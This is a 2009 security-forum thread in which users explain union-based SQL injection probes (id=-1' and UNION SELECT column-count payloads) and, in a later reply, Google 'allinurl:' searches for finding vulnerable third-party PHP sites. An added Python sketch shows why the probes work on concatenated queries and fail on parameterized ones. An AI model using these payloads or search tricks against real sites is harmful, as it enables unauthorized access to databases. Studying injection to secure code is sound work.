IT Security and Insecurity Portal |
when is it suitable to use sql injection or blind sql? |
Posted: Wed Jul 08, 2009 7:27 pm |
Kroo |
Regular user |
Joined: Jul 07, 2009 |
Posts: 5 |
OK, I need some information regarding the topic above. Still a newbie, please explain; it will surely help a lot. Thanks for your answer.
Posted: Wed Jul 08, 2009 9:14 pm |
tehhunter |
Valuable expert |
Joined: Nov 19, 2008 |
Posts: 261 |
If you think you have an exploitable parameter (.php?id=4 for example) then try something like this:
page.php?id=-1'
If you get an error, yes you have an exploitable parameter. Otherwise switch in " or any other characters.
If you got past the last step, try something like
page.php?id=-1' UNION SELECT 1--
page.php?id=-1' UNION SELECT 1,2--
page.php?id=-1' UNION SELECT 1,2,3--
...
page.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9--
You should be seeing an error about the improper number of columns. Keep adding numbers, starting from 1, until that error disappears. Note the largest number you typed.
If the page loads normally, look around for any of the numbers (1,2,3...9). See any? If so, you don't need blind sql injection.
Do you not see any? Then you do.
I won't get into why but use that as a guide. |
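Added example, not part of any post in this thread: a Python sketch against an in-memory SQLite database showing why the probes in the post above yield an error or visible numbers when the parameter is concatenated into the query, and why the same inputs are inert once the parameter is bound. The `news` table, its row and all function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the table behind page.php?id=4.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    db.execute("INSERT INTO news VALUES (4, 'Release notes', 'Version 2 is out')")
    return db

def fetch_concatenated(db, raw_id):
    # Vulnerable pattern: the request parameter becomes part of the SQL text,
    # so a quote character changes the structure of the statement.
    sql = "SELECT title, body FROM news WHERE id = '" + raw_id + "'"
    try:
        return ("rows", db.execute(sql).fetchall())
    except sqlite3.Error as exc:
        return ("error", str(exc))

def fetch_parameterized(db, raw_id):
    # Hardened pattern: the parameter is bound as a value and is never
    # parsed as SQL, whatever characters it contains.
    sql = "SELECT title, body FROM news WHERE id = ?"
    try:
        return ("rows", db.execute(sql, (raw_id,)).fetchall())
    except sqlite3.Error as exc:
        return ("error", str(exc))

# The legitimate value followed by the probe strings quoted in the post.
PROBES = ["4", "-1'", "-1' UNION SELECT 1--", "-1' UNION SELECT 1,2--"]

def compare():
    # Run every probe through both query styles on the same database.
    db = make_db()
    return [(p, fetch_concatenated(db, p), fetch_parameterized(db, p))
            for p in PROBES]

if __name__ == "__main__":
    for probe, weak, strong in compare():
        print(f"{probe!r}\n  concatenated:  {weak}\n  parameterized: {strong}")
```

With concatenation, the lone quote breaks the statement (the error), a mismatched column count is rejected, and a matching count returns the row `(1, 2)` that the page would then render; with a bound parameter each probe is just an id that matches nothing.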
Posted: Wed Jul 08, 2009 10:21 pm |
waraxe |
Site admin |
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
It's an easy decision - if there is a possibility, then use visual feedback. Even better if it's able to do multi-row fetch. Blind injection is a last-resort method. It has bad performance, and in the case of delay-based tricks it can be unreliable, but still - it can do the magic if implemented correctly.
Posted: Thu Jul 09, 2009 4:29 am |
Kroo |
Regular user |
Joined: Jul 07, 2009 |
Posts: 5 |
Wow, that explains a lot. Thanks, you guys. I'll be back with more questions. Thanks to tehhunter and waraxe too for your explanations, which really reignited my interest.
Posted: Fri Jul 10, 2009 3:39 am |
heaths |
Beginner |
Joined: Jul 10, 2009 |
Posts: 1 |
Location: heaths |
Posted: Fri Jul 10, 2009 6:10 pm |
Kroo |
Regular user |
Joined: Jul 07, 2009 |
Posts: 5 |
tehhunter wrote: | If you think you have an exploitable parameter (.php?id=4 for example) then try something like this:
page.php?id=-1'
If you get an error, yes you have an exploitable parameter. Otherwise switch in " or any other characters.
If you got past the last step, try something like
page.php?id=-1' UNION SELECT 1--
page.php?id=-1' UNION SELECT 1,2--
page.php?id=-1' UNION SELECT 1,2,3--
...
page.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9--
You should be seeing an error about the improper number of columns. Keep adding numbers, starting from 1, until that error disappears. Note the largest number you typed.
If the page loads normally, look around for any of the numbers (1,2,3...9). See any? If so, you don't need blind sql injection.
Do you not see any? Then you do.
I won't get into why but use that as a guide. |
Yo, tehhunter, in the above statement you said something about an exploitable parameter, right? Well, I guess the number 4 there is something that you relate to the exploitable parameter.
So my question is this: how do I find the exploitable parameter if I have a website like this, e.g. www.site.com, because I don't see any number there?
Posted: Fri Jul 10, 2009 6:42 pm |
waraxe |
Site admin |
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
Posted: Fri Jul 10, 2009 8:15 pm |
Kroo |
Regular user |
Joined: Jul 07, 2009 |
Posts: 5 |
Goody, thanks waraxe, you are such a helpful admin. I'm starting to love this forum already.
Posted: Sun Sep 27, 2009 1:48 am |
javiercmh |
Beginner |
Joined: Jul 30, 2009 |
Posts: 3 |
Kroo wrote: | tehhunter wrote: | If you think you have an exploitable parameter (.php?id=4 for example) then try something like this:
page.php?id=-1'
If you get an error, yes you have an exploitable parameter. Otherwise switch in " or any other characters.
If you got past the last step, try something like
page.php?id=-1' UNION SELECT 1--
page.php?id=-1' UNION SELECT 1,2--
page.php?id=-1' UNION SELECT 1,2,3--
...
page.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9--
You should be seeing an error about the improper number of columns. Keep adding numbers, starting from 1, until that error disappears. Note the largest number you typed.
If the page loads normally, look around for any of the numbers (1,2,3...9). See any? If so, you don't need blind sql injection.
Do you not see any? Then you do.
I won't get into why but use that as a guide. |
Yo, tehhunter, in the above statement you said something about an exploitable parameter, right? Well, I guess the number 4 there is something that you relate to the exploitable parameter.
So my question is this: how do I find the exploitable parameter if I have a website like this, e.g. www.site.com, because I don't see any number there? |
Hi,
In your example (www.site.com) there's no number, because you aren't looking for it. To find those numbers, you have to look for them using a search engine. I prefer Google because it has a very useful command:
'allinurl:' (with no ''). All you have to do, following the example you quoted, is to search: "allinurl:something.php?id=4".
The allinurl command is used for searching content in the URLs of any webpage. Then we have a special word, which is «something» in this case. You have to be creative and write the word you think will return a lot of results (like news, noticia, article, etc.). Finally we have .php?id=4 (any number); this means that we will find pages in PHP with a modifier id=NUMBER. For this NUMBER you also have to use your imagination and choose the number you think is best for your interests.
I hope that helps, sorry for my spelling (maybe grammar), WYNH (formerly javiercmh)
All times are GMT